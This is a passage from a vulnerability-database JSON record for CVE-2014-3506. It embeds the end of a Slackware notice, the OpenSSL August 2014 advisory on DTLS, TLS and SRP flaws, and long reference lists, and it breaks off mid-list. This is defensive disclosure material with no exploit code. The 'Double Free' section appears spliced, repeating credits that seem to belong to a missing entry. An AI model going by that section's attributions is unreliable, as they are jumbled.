a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. \n\n\nCrash with SRP ciphersuite in Server Hello message (CVE-2014-5139)\n==================================================================\n\nThe issue affects OpenSSL clients and allows a malicious server to crash\nthe client with a null pointer dereference (read) by specifying an SRP\nciphersuite even though it was not properly negotiated with the client. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nRace condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n==============================================================\n\nIf a multithreaded client connects to a malicious server using a resumed session\nand the server sends an ec point format extension it could write up to 255 bytes\nto freed memory. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. This can be exploited through a Denial of\nService attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory leak from zero-length fragments (CVE-2014-3507)\n===========================================================\n\nBy sending carefully crafted DTLS packets an attacker could cause openssl to\nleak memory. This can be exploited through a Denial of Service attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. A malicious server can crash the client with a null\npointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and\nsending carefully crafted handshake messages. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\n\nOpenSSL TLS protocol downgrade attack (CVE-2014-3511)\n=====================================================\n\nA flaw in the OpenSSL SSL/TLS server code causes the server to negotiate\nTLS 1.0 instead of higher protocol versions when the ClientHello message is\nbadly fragmented. This allows a man-in-the-middle attacker to force a\ndowngrade to TLS 1.0 even if both the server and the client support a higher\nprotocol version, by modifying the client\u0027s TLS records. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-3506" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "BID", "id": "69076" }, { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "127940" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3506", "trust": 3.9 }, { "db": "BID", "id": "69076", "trust": 1.4 }, { "db": "SECUNIA", "id": "61250", "trust": 1.1 }, { "db": "SECUNIA", "id": "59710", "trust": 1.1 }, { "db": "SECUNIA", "id": "60687", "trust": 1.1 }, { "db": "SECUNIA", "id": "61184", "trust": 1.1 }, { "db": "SECUNIA", "id": "60938", "trust": 1.1 }, { "db": "SECUNIA", "id": "60684", "trust": 1.1 }, { "db": "SECUNIA", "id": "61775", "trust": 1.1 }, { "db": "SECUNIA", "id": "60493", "trust": 1.1 }, { "db": "SECUNIA", "id": "59221", "trust": 1.1 }, { "db": "SECUNIA", "id": "60221", "trust": 1.1 }, { "db": "SECUNIA", "id": "59743", "trust": 1.1 }, { "db": "SECUNIA", "id": "60778", "trust": 1.1 }, { "db": "SECUNIA", "id": "61017", "trust": 1.1 }, { "db": "SECUNIA", "id": "59756", "trust": 1.1 }, { "db": "SECUNIA", "id": "60921", "trust": 1.1 }, { "db": "SECUNIA", "id": "61959", "trust": 1.1 }, { "db": "SECUNIA", "id": "60917", "trust": 1.1 }, { "db": "SECUNIA", "id": "61040", "trust": 1.1 }, { "db": "SECUNIA", "id": "59700", "trust": 1.1 }, { "db": "SECUNIA", "id": "60803", "trust": 1.1 }, { "db": "SECUNIA", "id": "60824", "trust": 1.1 }, { "db": "SECUNIA", "id": "61100", "trust": 1.1 }, { "db": "SECUNIA", "id": "60022", "trust": 1.1 }, { "db": "SECUNIA", "id": "58962", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-003810", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-128", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-3506", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128214", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127940", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128387", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127799", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127790", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127862", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128297", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "BID", "id": "69076" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "127940" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-128" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "id": "VAR-201408-0095", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-22T21:22:36.590000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HPSBHF03293", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "title": "HPSBUX03095 SSRT101674", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04404655" }, { "title": "HPSBOV03099 SSRT101686", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04426586" }, { "title": "1682293", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "title": "1686997", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "title": "Fix DTLS handshake message size checks.", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=1250f12613b61758675848f6600ebd914ccd7636" }, { "title": "DTLS memory exhaustion (CVE-2014-3506)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "title": "ELSA-2014-1053", "trust": 0.8, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "title": "RHSA-2014:1297", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-1297.html" }, { "title": "RHSA-2014:1256", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-1256.html" }, { "title": "Huawei-SA-20141008-OpenSSL", "trust": 0.8, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "title": "TLSA-2014-6", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2014/tlsa-2014-6j.html" }, { "title": "openssl-0.9.8zb", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51694" }, { "title": "openssl-1.0.1i", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51696" }, { "title": "openssl-1.0.0n", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51695" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2308-1" }, { "title": "Debian Security Advisories: DSA-2998-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=bfd576c692d8814b2a331baf29ad367c" }, { "title": "Amazon Linux AMI: ALAS-2014-391", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-391" }, { "title": "Symantec Security Advisories: SA85 : OpenSSL Security Advisory 06-Aug-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=02a206cf2efb06aecdaf29aeca851b55" }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "CNNVD", "id": "CNNVD-201408-128" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2014-1256.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-1297.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60687" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60824" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140853041709441\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141077370928502\u0026w=2" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127500" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69076" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:158" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61250" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61040" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60778" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59743" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95160" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=1250f12613b61758675848f6600ebd914ccd7636" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3506" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684903" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04426586" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404655" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2deee-50da9c14daae3/cert_mini_security_bulletin_xrx15a_v1-01.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182784" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691014" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=1250f12613b61758675848f6600ebd914ccd7636" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35205" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512\u003e" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140806.txt\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:18.openssl.asc\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139\u003e" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayp" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.3" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0221.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1053.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.1.0" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "BID", "id": "69076" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", 